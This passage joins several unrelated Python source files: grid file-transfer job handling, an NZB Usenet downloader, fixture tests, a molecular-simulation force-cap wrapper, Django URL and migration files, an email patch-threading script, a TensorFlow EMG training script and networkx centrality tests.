      self.__createFTSJob( self.ftsGUID )
    res = self.__isSummaryValid()
    if not res['OK']:
      return res
    if untilTerminal:
      res = self.summary( untilTerminal = untilTerminal, printOutput = printOutput )
      if not res['OK']:
        return res
    res = self.__parseOutput( full = full )
    if not res['OK']:
      return res
    if untilTerminal:
      self.finalize()
    if printOutput:
      self.dump()
    return res

  def dumpSummary( self, printOutput = False ):
    """ get FTS job summary as str

    :param self: self reference
    :param bool printOutput: print summary to stdout
    """

    outStr = ''
    for status in sorted( self.statusSummary ):
      if self.statusSummary[status]:
        outStr = '%s\t%-10s : %-10s\n' % ( outStr, status, str( self.statusSummary[status] ) )
    outStr = outStr.rstrip( '\n' )
    if printOutput:
      print outStr
    return S_OK( outStr )

  def __print( self ):
    """ print progress bar of FTS job completeness to stdout

    :param self: self reference
    """
    width = 100
    bits = int( ( width * self.percentageComplete ) / 100 )
    outStr = "|%s>%s| %.1f%s %s %s" % ( "="*bits, " "*( width - bits ),
                                        self.percentageComplete, "%",
                                        self.requestStatus, " "*10 )
    sys.stdout.write( "%s\r" % ( outStr ) )
    sys.stdout.flush()

  def dump( self ):
    """ print FTS job parameters and files to stdout

    :param self: self reference
    """
    print "%-10s : %-10s" % ( "Status", self.requestStatus )
    print "%-10s : %-10s" % ( "Source", self.sourceSE )
    print "%-10s : %-10s" % ( "Target", self.targetSE )
    print "%-10s : %-128s" % ( "Server", self.ftsServer )
    print "%-10s : %-128s" % ( "GUID", self.ftsGUID )
    for lfn in sorted( self.fileDict ):
      print "\n  %-15s : %-128s" % ( 'LFN', lfn )
      for key in ['Source', 'Target', 'Status', 'Reason', 'Duration']:
        print "  %-15s : %-128s" % ( key, str( self.fileDict[lfn].get( key ) ) )
    return S_OK()

  def __isSummaryValid( self ):
    """ check validity of FTS job summary report

    :param self: self reference
    """
    if not self.ftsServer:
      return S_ERROR( "FTSServer not set" )
    if not self.ftsGUID:
      return S_ERROR( "FTSGUID not set" )
    return S_OK()

  def __parseOutput( self, full = False ):
    """ execute glite-transfer-status command and parse its output

    :param self: self reference
    :param bool full: glite-transfer-status verbosity level, when set, collect information of files as well
    """
    monitor = self.ftsJob.monitorFTS2( command = self.monitorCommand, full = full )
    if not monitor['OK']:
      return monitor
    self.percentageComplete = self.ftsJob.Completeness
    self.requestStatus = self.ftsJob.Status
    self.submitTime = self.ftsJob.SubmitTime

    statusSummary = monitor['Value']
    if statusSummary:
      for state in statusSummary:
        self.statusSummary[state] = statusSummary[state]

    self.transferTime = 0
    for ftsFile in self.ftsJob:
      lfn = ftsFile.LFN
      self.__setFileParameter( lfn, 'Status', ftsFile.Status )
      self.__setFileParameter( lfn, 'Reason', ftsFile.Error )
      self.__setFileParameter( lfn, 'Duration', ftsFile._duration )
      targetURL = self.__getFileParameter( lfn, 'Target' )
      if not targetURL['OK']:
        self.__setFileParameter( lfn, 'Target', ftsFile.TargetSURL )
      self.transferTime += int( ftsFile._duration )
    return S_OK()

  ####################################################################
  #
  #  Methods for finalization
  #

  def finalize( self ):
    """ finalize FTS job

    :param self: self reference
    """
    self.__updateMetadataCache()
    transEndTime = dateTime()
    regStartTime = time.time()
    res = self.getTransferStatistics()
    transDict = res['Value']

    res = self.__registerSuccessful( transDict['transLFNs'] )

    regSuc, regTotal = res['Value']
    regTime = time.time() - regStartTime
    if self.sourceSE and self.targetSE:
      self.__sendAccounting( regSuc, regTotal, regTime, transEndTime, transDict )
    return S_OK()

  def getTransferStatistics( self ):
    """ collect information of Transfers that can be used by Accounting

    :param self: self reference
    """
    transDict = { 'transTotal': len( self.fileDict ),
                  'transLFNs': [],
                  'transOK': 0,
                  'transSize': 0 }

    for lfn in self.fileDict:
      if self.fileDict[lfn].get( 'Status' ) in self.successfulStates:
        if self.fileDict[lfn].get( 'Duration', 0 ):
          transDict['transLFNs'].append( lfn )
          transDict['transOK'] += 1
          if lfn in self.catalogMetadata:
            transDict['transSize'] += self.catalogMetadata[lfn].get( 'Size', 0 )

    return S_OK( transDict )

  def getFailedRegistrations( self ):
    """ get failed registrations dict

    :param self: self reference
    """
    return S_OK( self.failedRegistrations )

  def __registerSuccessful( self, transLFNs ):
    """ register successfully transferred files to the catalogs,
    fill failedRegistrations dict for files that failed to register

    :param self: self reference
    :param list transLFNs: LFNs in FTS job
    """
    self.failedRegistrations = {}
    toRegister = {}
    for lfn in transLFNs:
      res = returnSingleResult( self.oTargetSE.getURL( self.fileDict[lfn].get( 'Target' ), protocol = 'srm' ) )
      if not res['OK']:
        self.__setFileParameter( lfn, 'Reason', res['Message'] )
        self.__setFileParameter( lfn, 'Status', 'Failed' )
      else:
        toRegister[lfn] = { 'PFN' : res['Value'], 'SE' : self.targetSE }
    if not toRegister:
      return S_OK( ( 0, 0 ) )
    res = self.__getCatalogObject()
    if not res['OK']:
      for lfn in toRegister:
        self.failedRegistrations = toRegister
        self.log.error( 'Failed to get Catalog Object', res['Message'] )
        return S_OK( ( 0, len( toRegister ) ) )
    res = self.oCatalog.addReplica( toRegister )
    if not res['OK']:
      self.failedRegistrations = toRegister
      self.log.error( 'Failed to get Catalog Object', res['Message'] )
      return S_OK( ( 0, len( toRegister ) ) )
    for lfn, error in res['Value']['Failed'].items():
      self.failedRegistrations[lfn] = toRegister[lfn]
      self.log.error( 'Registration of Replica failed', '%s : %s' % ( lfn, str( error ) ) )
    return S_OK( ( len( res['Value']['Successful'] ), len( toRegister ) ) )

  def __sendAccounting( self, regSuc, regTotal, regTime, transEndTime, transDict ):
    """ send accounting record

    :param self: self reference
    :param regSuc: number of files successfully registered
    :param regTotal: number of files attepted to register
    :param regTime: time stamp at the end of registration
    :param transEndTime: time stamp at the end of FTS job
    :param dict transDict: dict holding couters for files being transerred, their sizes and successfull transfers
    """

    oAccounting = DataOperation()
    oAccounting.setEndTime( transEndTime )
    oAccounting.setStartTime( self.submitTime )

    accountingDict = {}
    accountingDict['OperationType'] = 'replicateAndRegister'
    result = getProxyInfo()
    if not result['OK']:
      userName = 'system'
    else:
      userName = result['Value'].get( 'username', 'unknown' )
    accountingDict['User'] = userName
    accountingDict['Protocol'] = 'FTS' if 'fts3' not in self.ftsServer else 'FTS3'
    accountingDict['RegistrationTime'] = regTime
    accountingDict['RegistrationOK'] = regSuc
    accountingDict['RegistrationTotal'] = regTotal
    accountingDict['TransferOK'] = transDict['transOK']
    accountingDict['TransferTotal'] = transDict['transTotal']
    accountingDict['TransferSize'] = transDict['transSize']
    accountingDict['FinalStatus'] = self.requestStatus
    accountingDict['Source'] = self.sourceSE
    accountingDict['Destination'] = self.targetSE
    accountingDict['TransferTime'] = self.transferTime
    oAccounting.setValuesFromDict( accountingDict )
    self.log.verbose( "Attempting to commit accounting message..." )
    oAccounting.commit()
    self.log.verbose( "...committed." )
    return S_OK()


import sys, os, urllib, time, socket, mt, ssl
from dlmanager.NZB import NZBParser
from dlmanager.NZB.nntplib2 import NNTP_SSL,NNTPError,NNTP, NNTPReplyError
from dlmanager.NZB.Decoder import ArticleDecoder

class StatusReport(object):
    def __init__(self):
        self.message = "Downloading.."
        self.total_bytes = 0
        self.current_bytes = 0
        self.completed = False
        self.error_occured = False
        self.start_time = 0
        self.file_name = ""
        self.kbps = 0
        self.assembly = False
        self.assembly_percent = 0

class NZBClient():
    def __init__(self, nzbFile, save_to, nntpServer, nntpPort, nntpUser=None, nntpPassword=None, nntpSSL=False, nntpConnections=5, cache_path=""):

        # Settings
        self.save_to = save_to
        self.nntpServer = nntpServer
        self.nntpUser = nntpUser
        self.nntpPort = nntpPort
        self.nntpPassword = nntpPassword
        self.nntpSSL = nntpSSL
        self.nntpConnections = nntpConnections
        self.threads = []
        self.running = False

        # setup our cache folder.
        self.cache_path = cache_path
        if ( self.cache_path == "" ): self.cache_path = "packages/dlmanager/cache/"
        self.clearCache()

        # ensure both directorys exist
        mt.utils.mkdir(self.save_to)
        mt.utils.mkdir(self.cache_path)

        # Open the NZB, get this show started.
        realFile = urllib.urlopen(nzbFile)
        self.nzb = NZBParser.parse(realFile)
        self.all_decoded = False
        self.connection_count = 0

        # used to track status.
        self.status = StatusReport()
        self.status.file_name = nzbFile
        self.status.total_bytes = self.nzb.size

        # Segment tracking.
        self.cache = []
        self.segment_list = []
        self.segments_finished = []
        self.segments_aborted = []

        # Queues.
        self.segment_queue = []
        self.failed_queue = []

        # Used to track the speed.
        self.speedTime = 0
        self.speedCounter = 0

    def start(self):
        # keep track of running time.
        self.status.start_time = time.time()
        self.running = True

        # Generate a list of segments and build our queue.
        for file in self.nzb.files:
            for seg in file.segments:
                self.segment_list.append(seg.msgid)
                self.segment_queue.append(seg)

        # start the connections.
        for a in range(0, self.nntpConnections):
            thread = NNTPConnection(a, 
                self.nntpServer, 
                self.nntpPort, 
                self.nntpUser, 
                self.nntpPassword, 
                self.nntpSSL, 
                self.nextSeg, 
                self.segComplete, 
                self.segFailed, 
                self.threadStopped)
            self.threads.append(thread)
            self.connection_count += 1
            thread.start()

        # start the article decoder.
        self.articleDecoder = ArticleDecoder(self.decodeNextSeg, 
                self.save_to, 
                self.cache_path, 
                self.decodeFinished, 
                self.decodeSuccess, 
                self.decodeFailed,
                self.assemblyStatus)
        self.articleDecoder.start()

    def getStatus(self):
        return self.status

    # Article Decoder - Next segment.
    def decodeNextSeg(self):
        # if we're not running send an instant kill switch.
        if ( not self.running ): return -1

        # try to grab a segment from the cache to decode.
        seg = None
        try:
            seg = self.cache.pop()
        except:
            pass	

        if ( seg == None ) and ( self.all_decoded ):
            return -1
        return seg

    # Article Decoder - Decoded all segments.
    def decodeFinished(self):
        self.status.completed = True
        
    # Article Decoder - Decode success.
    def decodeSuccess(self, seg):
        self.status.current_bytes += seg.size
        self.segments_finished.append(seg.msgid)
        if ( (len(self.segments_finished)+len(self.segments_aborted)) >= len(self.segment_list) ):
            self.all_decoded = True

    # Article Decoder - Decode failed.
    def decodeFailed(self, seg):
        if ( seg == None ): return
        mt.log.debug("Segment failed to decode: " + seg.msgid)
        self.segFailed(seg)

    # Article Decoder - Assembly Status.
    def assemblyStatus(self, percent):
        self.status.assembly = True
        self.status.assembly_percent = percent

    # NNTP Connection - Thread stopped.
    def threadStopped(self, thread_num):
        self.connection_count -= 1

    # NNTP Connection - Segment completed.
    def segComplete(self, seg):
        if ( seg == None ): return

        if ( seg.data ): 
            data_size = len("".join(seg.data))

            current_time = time.time()
            if ( (current_time - self.speedTime) > 1 ):
                self.status.kbps = self.speedCounter
                self.speedCounter = 0
                self.speedTime = current_time
            else:
                self.speedCounter += (data_size/1024)

            self.cache.append(seg)
        #mt.log.debug("Segment Complete: " + seg.msgid)

    # NNTP Connection - Download of segment failed.
    def segFailed(self, seg):
        if ( seg == None ): return

        if ( seg.aborted() ):
            mt.log.error("Segment Aborted: " + seg.msgid + " after " + str(seg.retries) + " attempts.")
            self.segments_aborted.append(seg.msgid)
            seg.data = []
            if ( (len(self.segments_finished)+len(self.segments_aborted)) >= len(self.segment_list) ):
                self.all_decoded = True
            return

        seg.retries += 1

        mt.log.error("Segment Failed: " + seg.msgid + " Attempt #" + str(seg.retries) + ".")
        self.failed_queue.append(seg)

    # NNTP Connection - Next Segment
    def nextSeg(self):
        # if we're not running send an instant kill switch.
        if ( not self.running ): return -1

        # try to get a segment from main queue or failed queue.
        queue_empty = False
        seg = None
        try:
            seg = self.segment_queue.pop()
        except:
            try:
                seg = self.failed_queue.pop()
            except:
                queue_empty = True
                pass
            pass

        # We're all outta segments, if they're done decoding, kill the threads.
        if ( queue_empty ) and ( self.all_decoded ):
            return -1

        return seg

    # empty the cache of any files.
    def clearCache(self):
        mt.utils.rmdir(self.cache_path)
            
    def stop(self):
        self.running = False
        self.articleDecoder.stop()
        for thread in self.threads:
            thread.stop()
        self.clearCache()

class NNTPConnection(mt.threads.Thread):
    def __init__(self, connection_number, server, port, username, password, ssl, nextSegFunc, onSegComplete = None, onSegFailed = None, onThreadStop = None):
        mt.threads.Thread.__init__(self)

        # Settings
        self.connection = None
        self.connection_number = connection_number
        self.server = server
        self.port = port
        self.username = username
        self.password = password
        self.ssl = ssl

        # Events.
        self.nextSegFunc = nextSegFunc
        self.onSegComplete = onSegComplete
        self.onSegFailed = onSegFailed
        self.onThreadStop = onThreadStop

    def connect(self):
        # Open either an SSL or regular NNTP connection.
        try:
            if ( self.ssl ):
                self.connection = NNTP_SSL(self.server, self.port, self.username, self.password, False, True, timeout=15)
            else:
                self.connection = NNTP(self.server, self.port, self.username, self.password, False, True, timeout=15)
        except:
            pass

        if ( self.connection ): return True
        return False

    def disconnect(self):
        if ( self.connection ):
            try:
                self.connection.quit()
            except:
                pass
        self.connection = None

    def run(self):
        connection = None
        seg = None

        # Thread has started.
        mt.log.debug("Thread " + str(self.connection_number) + " started.")
        start_time = time.time()

        while(self.running):
            seg = None
            connected = self.connect()
            if ( connected ):
                while(self.running):
                    seg = self.nextSegFunc()
                    
                    # Out of segments, sleep for a bit and see if we get anymore.
                    if ( seg == None ):
                        self.sleep(0.1)
                        continue

                    # Download complete, bail.
                    if ( seg == -1 ): 
                        self.running = False
                        seg = None
                        break

                    # Attempt to grab a segment.
                    try:
                        resp, nr, id, data = self.connection.body("<%s>" % seg.msgid)
                        if resp[0] == "2":
                            seg.data = data
                            if ( self.onSegComplete ): self.onSegComplete(seg)
                            seg = None

                    except ssl.SSLError:
                        break
                         
                    except NNTPError as e:
                        mt.log.error("Error getting segment: " + e.response)
                        pass
   
                    except:
                        mt.log.error("Error getting segment.")
                        pass

                    if ( seg and self.onSegFailed ): 
                        self.onSegFailed(seg)
                        seg = None

                # Disconnect when we're finished.
                if ( seg and self.onSegFailed ): self.onSegFailed(seg)
                self.disconnect()
            else:
                mt.log.error("Connection error. Reconnecting in 3 seconds.")
                self.sleep(3)

        # Thread has ended.
        self.disconnect() # just to be safe.
        end_time = time.time()
        mt.log.debug("Thread " + str(self.connection_number) + " stopped after " + str(end_time-start_time) + " seconds.")
        if ( self.onThreadStop ): self.onThreadStop(self.connection_number)

"""Tests for `fix.with_fixture`."""

from __future__ import with_statement

import os
import shutil
import tempfile

from types import FunctionType

from fix import with_fixture


def test_exists():
    """`fix.with_fixture` function exists"""
    assert isinstance(with_fixture, FunctionType)


def test_setup_only():
    """`setup_only` fixture works as expected"""

    def setup_only(context):
        """A fixture with no `teardown()`."""

        def setup():
            """Add something to the context."""
            assert context == {}
            context.squee = "kapow"

        return setup

    @with_fixture(setup_only)
    def case(context):
        """Check that the context has been set up."""
        assert context == {"squee": "kapow"}

    case()  # pylint: disable=E1120


def test_setup_teardown():
    """`setup_teardown` fixture works as expected"""

    def setup_teardown(context):
        """A fixture with both `setup()` and `teardown()`."""

        def setup():
            """Add something to the context."""
            assert context == {}
            context.squee = "kapow"

        def teardown():
            """Check that `context.squee` has changed."""
            assert context == {"squee": "boing"}

        return setup, teardown

    @with_fixture(setup_teardown)
    def case(context):
        """Alter the context."""
        assert context == {"squee": "kapow"}
        context.squee = "boing"

    case()  # pylint: disable=E1120


def test_multiple_invocation():
    """`multiple` fixture creates a fresh context each invocation"""

    def multiple(context):
        """A fixture to be invoked multiple times."""

        def setup():
            """Add something to the context."""
            assert context == {}
            context.squee = "kapow"

        def teardown():
            """Check that `context.squee` has changed."""
            assert context == {"squee": "kapow", "boing": "thunk"}

        return setup, teardown

    @with_fixture(multiple)
    def case(context):
        """Add to the context."""
        assert context == {"squee": "kapow"}
        context.boing = "thunk"

    for _ in range(3):
        case()  # pylint: disable=E1120


def test_external():
    """`external` fixture interacts as expected with the 'real world'."""

    def external(context, files=3):
        """A fixture to manipulate temporary files and directories."""

        def setup():
            """Create some temporary files."""
            context.temp_dir = tempfile.mkdtemp()
            context.filenames = ["file_%03d" % i for i in range(files)]
            for filename in context.filenames:
                with open(os.path.join(context.temp_dir, filename), "w") as f:
                    f.write("This is the file %r.\n" % filename)

        def teardown():
            """Delete the temporary files created in `setup()`."""
            shutil.rmtree(context.temp_dir)

        return setup, teardown

    @with_fixture(external, files=5)
    def check_files(context):
        """Return the number of present and absent files."""
        present = 0
        absent = 0
        for filename in context.filenames:
            if os.path.exists(os.path.join(context.temp_dir, filename)):
                present += 1
            else:
                absent += 1
        return context.temp_dir, present, absent

    temp_dir, present, absent = check_files()  # pylint: disable=E1120
    assert not os.path.exists(temp_dir)
    assert present == 5
    assert absent == 0

#  Copyright (C) 2012,2013
#      Max Planck Institute for Polymer Research
#  Copyright (C) 2008,2009,2010,2011
#      Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
#  This file is part of ESPResSo++.
#
#  ESPResSo++ is free software: you can redistribute it and/or modify
#  it under the terms of the GNU General Public License as published by
#  the Free Software Foundation, either version 3 of the License, or
#  (at your option) any later version.
#
#  ESPResSo++ is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program.  If not, see <http://www.gnu.org/licenses/>.


r"""
******************************
espressopp.integrator.CapForce
******************************

This class can be used to forcecap all particles or a group of particles.
Force capping means that the force vector of a particle is rescaled
so that the length of the force vector is <= capforce

Example Usage:

>>> capforce     = espressopp.integrator.CapForce(system, 1000.0)
>>> integrator.addExtension(capForce)

CapForce can also be used to forcecap only a group of particles:

>>> particle_group = [45, 67, 89, 103]
>>> capforce       = espressopp.integrator.CapForce(system, 1000.0, particle_group)
>>> integrator.addExtension(capForce)

.. function:: espressopp.integrator.CapForce(system, capForce, particleGroup)

                :param system:
                :param capForce:
                :param particleGroup: (default: None)
                :type system:
                :type capForce:
                :type particleGroup:
"""

from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.integrator.Extension import *
from _espressopp import integrator_CapForce

class CapForceLocal(ExtensionLocal, integrator_CapForce):

    def __init__(self, system, capForce, particleGroup = None):
        if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
            if (particleGroup == None) or (particleGroup.size() == 0):
                cxxinit(self, integrator_CapForce, system, capForce)
            else:
                cxxinit(self, integrator_CapForce, system, capForce, particleGroup)

if pmi.isController :
    class CapForce(Extension, metaclass=pmi.Proxy):
        pmiproxydefs = dict(
            cls =  'espressopp.integrator.CapForceLocal',
            pmicall = ['setCapForce', 'setAbsCapForce', 'getCapForce', 'getAbsCapForce'],
            pmiproperty = [ 'particleGroup', 'adress' ]
            )

# -*- coding: utf-8 -*-
"""proyectoP4 URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Add an import:  from blog import urls as blog_urls
    2. Add a URL to urlpatterns:  url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url, patterns
from django.contrib import admin
from Workinout import views
from django.conf import settings

urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^Workinout/', include('Workinout.urls')), # ADD THIS NEW TUPLE!media/(?P<path>.*)
]


if settings.DEBUG:
    urlpatterns += patterns(
        'django.views.static',
        (r'media/(?P<path>.*)',
        'serve',
        {'document_root': settings.MEDIA_ROOT}), )
else:
    urlpatterns += patterns('', url(r'^static/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_PATH}),
    )

#!/usr/bin/python

# This programs is intended to manage patches and apply them automatically
# through email in an automated fashion.
#
# Copyright (C) 2008  Imran M Yousuf (imran@smartitengineering.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

import poplib, email, re, sys, xmlConfigs, utils;

class ReferenceNode :
    def __init__(self, node, emailMessage, references=list(), children=dict(), slotted=bool("false")):
        self.node = node
        self.children = dict(children)
        self.references = references[:]
        self.slotted = slotted
        self.emailMessage = emailMessage
    def get_node(self):
        return self.node
    def get_children(self):
        return self.children
    def set_node(self, node):
        self.node = node
    def set_children(self, children):
        self.children = children
    def get_references(self):
        return self.references
    def is_slotted(self):
        return self.slotted
    def set_slotted(self, slotted):
        self.slotted = slotted
    def get_message(self):
        return self.emailMessage
    def __repr__(self):
        return self.node + "\nREF: " + str(self.references) + "\nChildren: " + str(self.children.keys()) + "\n"

def handleNode(currentNodeInAction, referenceNodeNow, referencesToCheck, patchMessageReferenceNode):
    for reference in referencesToCheck[:] :
        if reference in referenceNodeNow.get_children() :
            referencesToCheck.remove(reference)
            return patchMessageReferenceNode[reference]
    if len(referencesToCheck) == 0 :
        referenceNodeNow.get_children()[currentNodeInAction.get_node()] = currentNodeInAction
            

def makeChildren(patchMessageReferenceNode) :
    ref_keys = patchMessageReferenceNode.keys()
    ref_keys.sort()
    for messageId in ref_keys:
        referenceNode = patchMessageReferenceNode[messageId]
        utils.verboseOutput(verbose, "Managing Message Id:", referenceNode.get_node())
        referenceIds = referenceNode.get_references()
        referenceIdsClone = referenceIds[:]
        utils.verboseOutput(verbose, "Cloned References: ", referenceIdsClone)
        if len(referenceIds) > 0 :
            nextNode = patchMessageReferenceNode[referenceIdsClone[0]]
            referenceIdsClone.remove(referenceIdsClone[0])
            while nextNode != None :
                utils.verboseOutput(verbose, "Next Node: ", nextNode.get_node())
                utils.verboseOutput(verbose, "Curent Node: ", referenceNode.get_node())
                utils.verboseOutput(verbose, "REF: ", referenceIdsClone)
                nextNode = handleNode(referenceNode, nextNode, referenceIdsClone, patchMessageReferenceNode)

if __name__ == "__main__":
    arguments = sys.argv
    verbose = "false"
    pseudoArgs = arguments[:]
    while len(pseudoArgs) > 1 :
        argument = pseudoArgs[1]
        if argument == "-v" or argument == "--verbose" :
            verbose = "true"
        pseudoArgs.remove(argument)
    utils.verboseOutput(verbose, "Checking POP3 for gmail")
    try:
        emailConfig = xmlConfigs.initializePopConfig("./email-configuration.xml")
        myPop = emailConfig.get_pop3_connection()
        numMessages = len(myPop.list()[1])
        patchMessages = dict()
        for i in range(numMessages):
            utils.verboseOutput(verbose, "Index: ", i)
            totalContent = ""
            for content in myPop.retr(i+1)[1]:
                totalContent += content + '\n'
            msg = email.message_from_string(totalContent)
            if 'subject' in msg :
                subject = msg['subject']
                subjectPattern = "^\[.*PATCH.*\].+"
                subjectMatch = re.match(subjectPattern, subject)
                utils.verboseOutput(verbose, "Checking subject: ", subject)
                if subjectMatch == None :
                    continue
            else :
                continue
            messageId = ""
            if 'message-id' in msg:
                messageId = re.search("<(.*)>", msg['message-id']).group(1)
                utils.verboseOutput(verbose, 'Message-ID:', messageId)
            referenceIds = []
            if 'references' in msg:
                references = msg['references']
                referenceIds = re.findall("<(.*)>", references)
            utils.verboseOutput(verbose, "References: ", referenceIds)
            currentNode = ReferenceNode(messageId, msg, referenceIds)
            patchMessages[messageId] = currentNode
            currentNode.set_slotted(bool("false"))
        utils.verboseOutput(verbose, "**************Make Children**************")
        makeChildren(patchMessages)
        utils.verboseOutput(verbose, "--------------RESULT--------------")
        utils.verboseOutput(verbose, patchMessages)
    except:
        utils.verboseOutput(verbose, "Error: ", sys.exc_info())


# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-20 22:01
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('erudit', '0065_auto_20170202_1152'),
    ]

    operations = [
        migrations.AddField(
            model_name='issue',
            name='force_free_access',
            field=models.BooleanField(default=False, verbose_name='Contraindre en libre accès'),
        ),
    ]

# Example implementing 5 layer encoder
# Original code taken from
# https://github.com/aymericdamien/TensorFlow-Examples/blob/master/examples/3_NeuralNetworks/autoencoder.py
# The model trained here is restored in load.py

from __future__ import division, print_function, absolute_import

# Import MNIST data
# from tensorflow.examples.tutorials.mnist import input_data
# data_set = input_data.read_data_sets("/tmp/data/", one_hot=True)

# Import libraries
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import sys
import scipy.io as sio
sys.path.insert(0, '../..') # Add path to where TF_Model.py is, if not in the same dir
from TF_Model import *
from utils import *


# 01 thumb
# 10 pinky
action_map = {}
action_map[1] = [0,1]
action_map[2] = [1,0]

# thumb up
mat_contents_t0 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_pinky_Jan5_0.mat')
mat_contents_t1 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_pinky_Jan5_1.mat')
mat_contents_test0 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_pinky_jan5_2.mat')


data_t0 = mat_contents_t0['EMGdata']
data_t1 = mat_contents_t1['EMGdata']
data_test0 = mat_contents_test0['EMGdata']

batch_y_t0, batch_x_t0 = get_batch_from_raw_data_new_format(data_t0, action_map, [0])
batch_y_t1, batch_x_t1 = get_batch_from_raw_data_new_format(data_t1, action_map, [0])
batch_y_test0, batch_x_test0 = get_batch_from_raw_data_new_format(data_test0, action_map, [0])

# pinky up
mat_contents_p0 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_thumb_Jan5_0.mat')
mat_contents_p1 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_thumb_Jan5_1.mat')
mat_contents_test1 = sio.loadmat('/home/linda/school/capstone/data/set2_new_format/EMGjan5/Fred_thumb_Jan5_2.mat')

data_p0 = mat_contents_p0['EMGdata']
data_p1 = mat_contents_p1['EMGdata']
data_test1 = mat_contents_test1['EMGdata']

batch_y_p0, batch_x_p0 = get_batch_from_raw_data_new_format(data_p0, action_map, [0])
batch_y_p1, batch_x_p1 = get_batch_from_raw_data_new_format(data_p1, action_map, [0])
batch_y_test1, batch_x_test1 = get_batch_from_raw_data_new_format(data_test1, action_map, [0])

print("done reading data")
# Create TF_Model, a wrapper for models created using tensorflow
# Note that the configuration file 'config.txt' must be present in the directory
model = TF_Model('model')


# Parameters
learning_rate = 0.05
training_epochs = 200
batch_size = 256
display_step = 1
examples_to_show = 10
# total_batch = int(data_set.train.num_examples/batch_size)
dropout = tf.placeholder(tf.float32)

# Create variables for inputs, outputs and predictions
x = tf.placeholder(tf.float32, [None, 1000])
y = tf.placeholder(tf.float32, [None, 2])
y_true = y
y_pred = model.predict(x)

# Cost function
cost = tf.reduce_mean(tf.pow(y_true - y_pred, 2))
optimizer = tf.train.RMSPropOptimizer(learning_rate).minimize(cost)

# Initializing the variables
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)

model_output = model.predict(x)
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y * tf.log(model_output), reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(model_output,1), tf.argmax(y,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))


# Train
for epoch in range(training_epochs):
    _, c = sess.run([optimizer, cost], feed_dict={x: batch_x_t0, y: batch_y_t0})
    _, c = sess.run([optimizer, cost], feed_dict={x: batch_x_t1, y: batch_y_t1})
    _, c = sess.run([optimizer, cost], feed_dict={x: batch_x_p0, y: batch_y_p0})
    _, c = sess.run([optimizer, cost], feed_dict={x: batch_x_p1, y: batch_y_p1})

    # Display logs per epoch step
    print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c))
    print(sess.run(accuracy, feed_dict={x: batch_x_test0, y: batch_y_test0}))
    print(sess.run(accuracy, feed_dict={x: batch_x_test1, y: batch_y_test1}))
print("===final===")
print(sess.run(accuracy, feed_dict={x: batch_x_test0, y: batch_y_test0}))
print(sess.run(accuracy, feed_dict={x: batch_x_test1, y: batch_y_test1}))
# Save
model.save(sess, 'example_3')

"""
Tests for closeness centrality.
"""
import pytest
import networkx as nx
from networkx.testing import almost_equal


class TestClosenessCentrality:
    @classmethod
    def setup_class(cls):
        cls.K = nx.krackhardt_kite_graph()
        cls.P3 = nx.path_graph(3)
        cls.P4 = nx.path_graph(4)
        cls.K5 = nx.complete_graph(5)

        cls.C4 = nx.cycle_graph(4)
        cls.T = nx.balanced_tree(r=2, h=2)
        cls.Gb = nx.Graph()
        cls.Gb.add_edges_from([(0, 1), (0, 2), (1, 3), (2, 3), (2, 4), (4, 5), (3, 5)])

        F = nx.florentine_families_graph()
        cls.F = F

        cls.LM = nx.les_miserables_graph()

        # Create random undirected, unweighted graph for testing incremental version
        cls.undirected_G = nx.fast_gnp_random_graph(n=100, p=0.6, seed=123)
        cls.undirected_G_cc = nx.closeness_centrality(cls.undirected_G)

    def test_wf_improved(self):
        G = nx.union(self.P4, nx.path_graph([4, 5, 6]))
        c = nx.closeness_centrality(G)
        cwf = nx.closeness_centrality(G, wf_improved=False)
        res = {0: 0.25, 1: 0.375, 2: 0.375, 3: 0.25, 4: 0.222, 5: 0.333, 6: 0.222}
        wf_res = {0: 0.5, 1: 0.75, 2: 0.75, 3: 0.5, 4: 0.667, 5: 1.0, 6: 0.667}
        for n in G:
            assert almost_equal(c[n], res[n], places=3)
            assert almost_equal(cwf[n], wf_res[n], places=3)

    def test_digraph(self):
        G = nx.path_graph(3, create_using=nx.DiGraph())
        c = nx.closeness_centrality(G)
        cr = nx.closeness_centrality(G.reverse())
